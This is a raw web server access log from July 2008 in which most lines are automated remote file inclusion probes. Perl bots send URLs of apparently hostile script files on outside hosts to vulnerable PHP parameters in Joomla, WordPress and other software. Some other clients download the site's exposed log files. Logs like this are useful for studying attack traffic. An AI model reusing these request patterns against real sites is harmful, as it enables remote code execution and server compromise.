72.9.145.107 - - [29/Jul/2008:10:48:55 -0700] "GET /logs/access_080225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:49:07 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:49:08 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:49:08 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:49:27 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:49:30 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:49:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:49:31 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:49:35 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:49:35 -0700] "GET /bikes/dteel/2008_07_05/?N=D HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.127.172.3 - - [29/Jul/2008:10:49:42 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:49:49 -0700] "GET /logs/access_080215.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:49:55 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:49:56 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:50:08 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.224.174.43 - - [29/Jul/2008:10:50:20 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:50:32 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:50:33 -0700] "GET /samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:50:33 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:50:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:50:57 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:50:57 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:50:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:50:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:51:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:51:17 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:51:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.120.211.2 - - [29/Jul/2008:10:51:32 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:51:46 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.45.97.249 - - [29/Jul/2008:10:52:01 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:52:11 -0700] "GET /logs/access_080218.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:52:12 -0700] "GET /main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:52:12 -0700] "GET /logs/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:52:13 -0700] "GET /logs/access_080313.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.17.169 - - [29/Jul/2008:10:52:19 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.169 - - [29/Jul/2008:10:52:19 -0700] "GET /logs/access.log%20//e404.php?DOCUMENT_ROOT=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.169 - - [29/Jul/2008:10:52:19 -0700] "GET //e404.php?DOCUMENT_ROOT=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:52:21 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:52:22 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:52:23 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:52:24 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:52:27 -0700] "GET /logs/index.php?pagina=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:52:27 -0700] "GET /logs/access_080225.log/index.php?pagina=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:52:29 -0700] "GET /index.php?pagina=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18445 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:52:37 -0700] "GET /logs/access_080218.log/index.php?pagina=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:52:45 -0700] "GET /logs/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [29/Jul/2008:10:52:49 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/feed/ HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:52:54 -0700] "GET /logs/access_080225.log/squirrelcart/popup_window.php?site_isp_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:52:54 -0700] "GET /logs/squirrelcart/popup_window.php?site_isp_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:53:10 -0700] "GET /logs/access_080329.log/squirrelcart/popup_window.php?site_isp_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:53:13 -0700] "GET /samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:53:20 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:53:21 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
150.70.84.27 - - [29/Jul/2008:10:53:21 -0700] "GET /logs%2Faccess_080130.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:10:53:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:10:53:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:54:08 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:54:11 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:54:11 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:54:12 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:54:30 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:54:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.166 - - [29/Jul/2008:10:54:38 -0700] "GET ///vwar/backup/errors.php?error=http://www.clasp.org/news/idv6seph.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [29/Jul/2008:10:54:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.clasp.org/news/idv6seph.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [29/Jul/2008:10:54:38 -0700] "GET /logs/access_080128.log///vwar/backup/errors.php?error=http://www.clasp.org/news/idv6seph.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:54:39 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:54:39 -0700] "GET /logs/access_080315.log/samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:54:42 -0700] "GET /logs/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:54:42 -0700] "GET /logs/access_080329.log/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:54:42 -0700] "GET /errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:44 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:45 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:45 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:49 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:49 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:54:49 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:54:49 -0700] "GET /logs/access_080329.log/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:54:49 -0700] "GET /logs/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:54:49 -0700] "GET /errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:55:16 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:55:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:55:17 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:55:18 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:55:23 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:55:23 -0700] "GET /logs/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:55:31 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:55:31 -0700] "GET /com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:55:32 -0700] "GET /errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:55:32 -0700] "GET /logs/errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:55:49 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:55:49 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:55:50 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:55:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test?? HTTP/1.1" 200 18581 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:55:53 -0700] "GET /bikes/dteel/2008_07_05/?S=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:56:00 -0700] "GET /logs/access_080313.log/index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:56:02 -0700] "GET /index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 18391 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:56:02 -0700] "GET /logs/index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:56:07 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:56:08 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:56:09 -0700] "GET /logs/access_080315.log/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:56:09 -0700] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:10:56:09 -0700] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:10:56:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:10:56:54 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:56:56 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:56:57 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:56:57 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:10:56:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:01 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:01 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:02 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:57:05 -0700] "GET /logs/access_080207.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:05 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:05 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:05 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:57:23 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:57:23 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:24 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:57:25 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
